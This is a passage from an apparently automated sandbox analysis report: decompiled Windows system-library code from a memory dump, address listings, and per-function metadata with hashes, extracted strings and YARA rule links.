						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00A1DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00A0B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00A0B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00A0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00A0A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                          0x009cb171
                                                                                                                          0x009cb171
                                                                                                                          0x009cb171
                                                                                                                          0x009cb171
                                                                                                                          0x009cb171
                                                                                                                          0x009cb176
                                                                                                                          0x009cb17b
                                                                                                                          0x009cb180
                                                                                                                          0x009cb186
                                                                                                                          0x009cb18f
                                                                                                                          0x009cb198
                                                                                                                          0x009cb1a4
                                                                                                                          0x009cb1aa
                                                                                                                          0x00a24802
                                                                                                                          0x00a24802
                                                                                                                          0x00a24805
                                                                                                                          0x00a2480c
                                                                                                                          0x00a2480e
                                                                                                                          0x009cb1d1
                                                                                                                          0x009cb1d3
                                                                                                                          0x009cb1de
                                                                                                                          0x009cb1de
                                                                                                                          0x00a24817
                                                                                                                          0x00a2481e
                                                                                                                          0x00a24820
                                                                                                                          0x00a24822
                                                                                                                          0x00a24822
                                                                                                                          0x00a24824
                                                                                                                          0x00a24824
                                                                                                                          0x00a2482a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a24835
                                                                                                                          0x00a2483a
                                                                                                                          0x00a2483d
                                                                                                                          0x00a2483f
                                                                                                                          0x00a24842
                                                                                                                          0x00a24842
                                                                                                                          0x00a24842
                                                                                                                          0x00a24846
                                                                                                                          0x00a2484c
                                                                                                                          0x00a2484e
                                                                                                                          0x00a24851
                                                                                                                          0x00a24851
                                                                                                                          0x00a24853
                                                                                                                          0x00a24854
                                                                                                                          0x00a24854
                                                                                                                          0x00a24858
                                                                                                                          0x00a2485a
                                                                                                                          0x00a2485a
                                                                                                                          0x00a2485d
                                                                                                                          0x00a2485f
                                                                                                                          0x00a24861
                                                                                                                          0x00a24861
                                                                                                                          0x00a24866
                                                                                                                          0x00a2486b
                                                                                                                          0x00a2486e
                                                                                                                          0x00a24871
                                                                                                                          0x00a24876
                                                                                                                          0x00a24876
                                                                                                                          0x00a24878
                                                                                                                          0x00a2487b
                                                                                                                          0x00a24884
                                                                                                                          0x00a24884
                                                                                                                          0x00000000
                                                                                                                          0x00a2487d
                                                                                                                          0x00a2487d
                                                                                                                          0x00a24882
                                                                                                                          0x00a24889
                                                                                                                          0x00a24889
                                                                                                                          0x00a2488f
                                                                                                                          0x00a24891
                                                                                                                          0x00a248e0
                                                                                                                          0x00a248e2
                                                                                                                          0x00a248e4
                                                                                                                          0x00a248e4
                                                                                                                          0x00a248e7
                                                                                                                          0x00a248e7
                                                                                                                          0x00a248ed
                                                                                                                          0x00a248f4
                                                                                                                          0x00a248f6
                                                                                                                          0x00a24951
                                                                                                                          0x00a24951
                                                                                                                          0x00a24953
                                                                                                                          0x00a24953
                                                                                                                          0x00a24956
                                                                                                                          0x00a24956
                                                                                                                          0x00a24958
                                                                                                                          0x00a24959
                                                                                                                          0x00a24959
                                                                                                                          0x00a2495d
                                                                                                                          0x00a2495d
                                                                                                                          0x00a2495f
                                                                                                                          0x00a2495f
                                                                                                                          0x00a24965
                                                                                                                          0x00a24969
                                                                                                                          0x00a249ba
                                                                                                                          0x00a249ba
                                                                                                                          0x00a249c1
                                                                                                                          0x00a249c5
                                                                                                                          0x00a249cc
                                                                                                                          0x00a249d4
                                                                                                                          0x00a249d7
                                                                                                                          0x00a249da
                                                                                                                          0x00a249e4
                                                                                                                          0x00a249e5
                                                                                                                          0x00a249f3
                                                                                                                          0x00a24a02
                                                                                                                          0x00000000
                                                                                                                          0x00a24a02
                                                                                                                          0x00a24972
                                                                                                                          0x00a24974
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a24976
                                                                                                                          0x00a24979
                                                                                                                          0x00a24982
                                                                                                                          0x00a24983
                                                                                                                          0x00a24984
                                                                                                                          0x00a2498b
                                                                                                                          0x00a2498d
                                                                                                                          0x00a24991
                                                                                                                          0x00a24993
                                                                                                                          0x00a24999
                                                                                                                          0x00a2499d
                                                                                                                          0x00a249a2
                                                                                                                          0x00a249a2
                                                                                                                          0x00a249a2
                                                                                                                          0x00a24999
                                                                                                                          0x00a249ac
                                                                                                                          0x00000000
                                                                                                                          0x00a249b3
                                                                                                                          0x00a248f8
                                                                                                                          0x00a248fe
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a248fe
                                                                                                                          0x00a24895
                                                                                                                          0x00a2489c
                                                                                                                          0x00a248ad
                                                                                                                          0x00a248b2
                                                                                                                          0x00a248b5
                                                                                                                          0x00a248b7
                                                                                                                          0x00a248ba
                                                                                                                          0x00a248bc
                                                                                                                          0x00a248c6
                                                                                                                          0x00a248c6
                                                                                                                          0x00a248cb
                                                                                                                          0x00a248d1
                                                                                                                          0x00a248d4
                                                                                                                          0x00a248d8
                                                                                                                          0x00a248d8
                                                                                                                          0x00000000
                                                                                                                          0x00a248d8
                                                                                                                          0x00a248be
                                                                                                                          0x00a248c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a248c2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a248c4
                                                                                                                          0x00000000
                                                                                                                          0x00a24882
                                                                                                                          0x00a2487b
                                                                                                                          0x00a24904
                                                                                                                          0x00a24906
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a24908
                                                                                                                          0x00a2490e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a24910
                                                                                                                          0x00a24917
                                                                                                                          0x00a24917
                                                                                                                          0x00000000
                                                                                                                          0x00a24917
                                                                                                                          0x009cb1ba
                                                                                                                          0x00a247f9
                                                                                                                          0x00a247fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a247fc
                                                                                                                          0x009cb1c0
                                                                                                                          0x009cb1c0
                                                                                                                          0x009cb1c3
                                                                                                                          0x009cb1cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _vswprintf_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 677850445-0
                                                                                                                          • Opcode ID: 9c395bdc31ec6266f33bac1e2197b33e3b2ac5c2bbf8abee2ae71c1ff3b5d3d7
                                                                                                                          • Instruction ID: 1977091d00db5d10b7365fa9a218e5b829ca6a80a03cc50a43299b282a9ac4b1
                                                                                                                          • Opcode Fuzzy Hash: 9c395bdc31ec6266f33bac1e2197b33e3b2ac5c2bbf8abee2ae71c1ff3b5d3d7
                                                                                                                          • Instruction Fuzzy Hash: 7951EE71D102698EEF35CF68D945BBEBBB0BF08710F2041BDE859AB282D7744D818B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009F2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PATH
                                                                                                                          • API String ID: 0-1036084923
                                                                                                                          • Opcode ID: 561a49377db39a5fb4b28b97c7264ab7aa4f856beba1c2627d83f931051826c4
                                                                                                                          • Instruction ID: c862a2261ac3083c2b5d84e8b0c20649577e102cfe44fe377a09ef7432556825
                                                                                                                          • Opcode Fuzzy Hash: 561a49377db39a5fb4b28b97c7264ab7aa4f856beba1c2627d83f931051826c4
                                                                                                                          • Instruction Fuzzy Hash: 96C18F71E00219DBCB25DFA9D881BBEB7B5FF48710F144429F501AB2A1D778AD41CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RTL: Re-Waiting
                                                                                                                          • API String ID: 0-316354757
                                                                                                                          • Opcode ID: aaa639217e1e7f189c015b10065b622c4fd515d0c0b7a043458f687081f3408f
                                                                                                                          • Instruction ID: 7d89342a88d3809c9afcfc87a3ef28ca246565e314d9b7d0b6e5dd959d2f1452
                                                                                                                          • Opcode Fuzzy Hash: aaa639217e1e7f189c015b10065b622c4fd515d0c0b7a043458f687081f3408f
                                                                                                                          • Instruction Fuzzy Hash: 94612531E04684AFDB32DF68C840BBEB7A5EF44750F240679E816A72D2C7389D818792
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A90EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-2679148245
                                                                                                                          • Opcode ID: a93e4db5a74891054b7227bfb19dd7f6939dc09497f300f896cbdced3c0cee8b
                                                                                                                          • Instruction ID: a2c914f25fb1cb42b6e012451ad62965fc716b52e07fc122c5eb40c8e99fd097
                                                                                                                          • Opcode Fuzzy Hash: a93e4db5a74891054b7227bfb19dd7f6939dc09497f300f896cbdced3c0cee8b
                                                                                                                          • Instruction Fuzzy Hash: 8151AC713043429FDB25DF29D981F1BB7E9EBC4344F140A2CF98687291D631E945CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                          • Instruction ID: 4f4e69596a3cfc3ee80ebfb8001aa064889cf3af4c850a27aa4c6518376bc50f
                                                                                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                          • Instruction Fuzzy Hash: 7E51BF716047149FC321DF19C841A6BB7F8FF88750F00892DFA9587691E7B4E904CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A43540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryHash
                                                                                                                          • API String ID: 0-2202222882
                                                                                                                          • Opcode ID: df6aabeccffeb7099b7cd4dde63faec55c90877c066f4155d4d242166dc0c37f
                                                                                                                          • Instruction ID: 05e69c454983669b78a7669503ccd3f786bc47052c82f6684671aeacb46dc38c
                                                                                                                          • Opcode Fuzzy Hash: df6aabeccffeb7099b7cd4dde63faec55c90877c066f4155d4d242166dc0c37f
                                                                                                                          • Instruction Fuzzy Hash: DC4141B6D0052DAADF21DA50DD81FEEB77CAB44714F0145A5BA08AB281DB709F888F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-2679148245
                                                                                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                          • Instruction ID: 13a4e6a154dc4257be506bb7f158efbb906cc5c12aeea79540e422056ad9c5fc
                                                                                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                          • Instruction Fuzzy Hash: E331B0327043456FEB10DF29CD45F9677D9ABC4794F044229BA54DB281E7B0ED14CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A43884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryName
                                                                                                                          • API String ID: 0-215506332
                                                                                                                          • Opcode ID: 5b3146f608cceaea9a8bf891c28bb03572b0652cea4decfd1ebdff1dca914965
                                                                                                                          • Instruction ID: 987bb7b6583c4d2a60795de7fea5364816ef5332b2d1e70a77edecc0d91e9d94
                                                                                                                          • Opcode Fuzzy Hash: 5b3146f608cceaea9a8bf891c28bb03572b0652cea4decfd1ebdff1dca914965
                                                                                                                          • Instruction Fuzzy Hash: 2E31EE3BD0161ABFEF15DB59C955E6BB7B4EB80B20F114169A914A7282D6709F00CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009FD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 8fdfc080f4bf0fcf23f013d65dc819859cecc7bd919f02c2b68bee87742aac9d
                                                                                                                          • Instruction ID: 03b918596b9f06e60f71552f364e356a0da7105c4ee9a1c507b1eef962635856
                                                                                                                          • Opcode Fuzzy Hash: 8fdfc080f4bf0fcf23f013d65dc819859cecc7bd919f02c2b68bee87742aac9d
                                                                                                                          • Instruction Fuzzy Hash: 7B31D1B250A3099FC711DF28C981A6BBBE9FBC5758F10092EFA9483251E674DD04CB93
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009D1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: WindowsExcludedProcs
                                                                                                                          • API String ID: 0-3583428290
                                                                                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                          • Instruction ID: a150aac409cdb4d183a9dfdd4c2bacca4b48541b6afb82fb1f534d60797df2d0
                                                                                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                          • Instruction Fuzzy Hash: 3E210777695228BBCB229BA9D940F5FB7ADEF81B50F158826FD449B300D634DD00D7A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx
                                                                                                                          • API String ID: 0-89312691
                                                                                                                          • Opcode ID: 1a7b13d409f80990fd885f1c981b7e93c9db49fdffd0f54987a538f205d7b357
                                                                                                                          • Instruction ID: ca97b285b6b29febd3ae7b65fbf9b5c8fdfd953632fe6741a5e15cf04a1db9e7
                                                                                                                          • Opcode Fuzzy Hash: 1a7b13d409f80990fd885f1c981b7e93c9db49fdffd0f54987a538f205d7b357
                                                                                                                          • Instruction Fuzzy Hash: 48119335304AC28BE7264E1F84B0736729AEB95724F35493BE865CB391D776DC408380
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A78DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • Critical error detected %lx, xrefs: 00A78E21
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Critical error detected %lx
                                                                                                                          • API String ID: 0-802127002
                                                                                                                          • Opcode ID: a0faf4433a8b0cf951486247eae9e491fb14b785d3f6422a6477b7a4bc15a4ed
                                                                                                                          • Instruction ID: 32bcdb9c6b8afdbbcb1aa4015bee208e594e16d6722124711a3e4a4878c26172
                                                                                                                          • Opcode Fuzzy Hash: a0faf4433a8b0cf951486247eae9e491fb14b785d3f6422a6477b7a4bc15a4ed
                                                                                                                          • Instruction Fuzzy Hash: 1A115B71D55348EBDF24CFA48A0A7DCBBB0BB04715F24825DE429AB2C2C7784601CF14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A5FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00A5FF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                          • API String ID: 0-1911121157
                                                                                                                          • Opcode ID: e7453161535217a934b15e7c3f95ed4f3dfffe40083d3dab37db3d96cb025ff1
                                                                                                                          • Instruction ID: 6580f1720a3f17af2f05772d796a73801c753c69a142aefebd14c52fe97af0a0
                                                                                                                          • Opcode Fuzzy Hash: e7453161535217a934b15e7c3f95ed4f3dfffe40083d3dab37db3d96cb025ff1
                                                                                                                          • Instruction Fuzzy Hash: 18110071910144EFCB12EB50CE49FD8BBB1FF49715F148464F9096B6A2C7799A88CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A95BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 696fee8494e6cfd61a9c92148bfe78f20c05e63c195b1313e2986c4906019a41
                                                                                                                          • Instruction ID: b15ef30e558b00029c1d09c25297201adba9ece4182d37ece6e4fdaa7477dcf0
                                                                                                                          • Opcode Fuzzy Hash: 696fee8494e6cfd61a9c92148bfe78f20c05e63c195b1313e2986c4906019a41
                                                                                                                          • Instruction Fuzzy Hash: 97424875E006298FDF24CF68C981BAAB7F1FF49304F1481AAD84DAB242D7749A85CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009E4120, Relevance: .4, Instructions: 444COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d31a565520daf54d746f85dc992f66d204d2dd0975bb3099460fd15308fbe712
                                                                                                                          • Instruction ID: 9e2b6c9a6b01ea591726145407fa021a52e904deb70aa4094229b8b4935cd293
                                                                                                                          • Opcode Fuzzy Hash: d31a565520daf54d746f85dc992f66d204d2dd0975bb3099460fd15308fbe712
                                                                                                                          • Instruction Fuzzy Hash: CBF18C706083918BCB25CF1AC480A7AB7E5FF98714F14492EF496CB2A1E738DD91CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009F20A0, Relevance: .4, Instructions: 420COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a16288a825b3c1a8e060eaa31b9355ea21c948823c5ec270dcc774de8f18e219
                                                                                                                          • Instruction ID: a6dc0057b3fef9c33f43ee58c3327b1285286134df9ee213351c0aa1404df5a1
                                                                                                                          • Opcode Fuzzy Hash: a16288a825b3c1a8e060eaa31b9355ea21c948823c5ec270dcc774de8f18e219
                                                                                                                          • Instruction Fuzzy Hash: 78F11371A087459FDB25CF2CC84077A77E9AF85324F18892DFA958B291D778DC41CB82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EB236, Relevance: .3, Instructions: 305COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                                                                          • Instruction ID: 1a95fb82cba67169b7c01a78f75889eba12815f6ba1e7f5d1a86ad299c940b0b
                                                                                                                          • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                                                                          • Instruction Fuzzy Hash: 5EB1E031B006499FDB16CBAAC891BBFB7F9AF88300F204569E65297392D734DD00CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009D849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9372f45ed688f1a793cde543c17155ebc3cd66fd311b721c87ef750229978a77
                                                                                                                          • Instruction ID: 66512ff9ce5b52c471925bae41ecf24852532592c1782602f4e68c65f7f98d15
                                                                                                                          • Opcode Fuzzy Hash: 9372f45ed688f1a793cde543c17155ebc3cd66fd311b721c87ef750229978a77
                                                                                                                          • Instruction Fuzzy Hash: FAB16070E04219DFCB15DFD9D981AAEBBB9BF84704F20852AE405AB352DB74AD41CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009F513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2fcc9d7ed3807adf3c216ddc57f8e4d0e1be1cce380688e5600e6877444aac4c
                                                                                                                          • Instruction ID: 25ccdd53c2d7ccea65e0f026669916e3502e3021dab4f0c5f27cb8312a9f770a
                                                                                                                          • Opcode Fuzzy Hash: 2fcc9d7ed3807adf3c216ddc57f8e4d0e1be1cce380688e5600e6877444aac4c
                                                                                                                          • Instruction Fuzzy Hash: F7C122756087809FD354CF28C580A6AFBF1BF88304F188A6EF9998B352D775E945CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009F03E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c36ad58b92b9d1ca20cfb8a8dd73a98e467b2a8995d5276423b075f6f5d13013
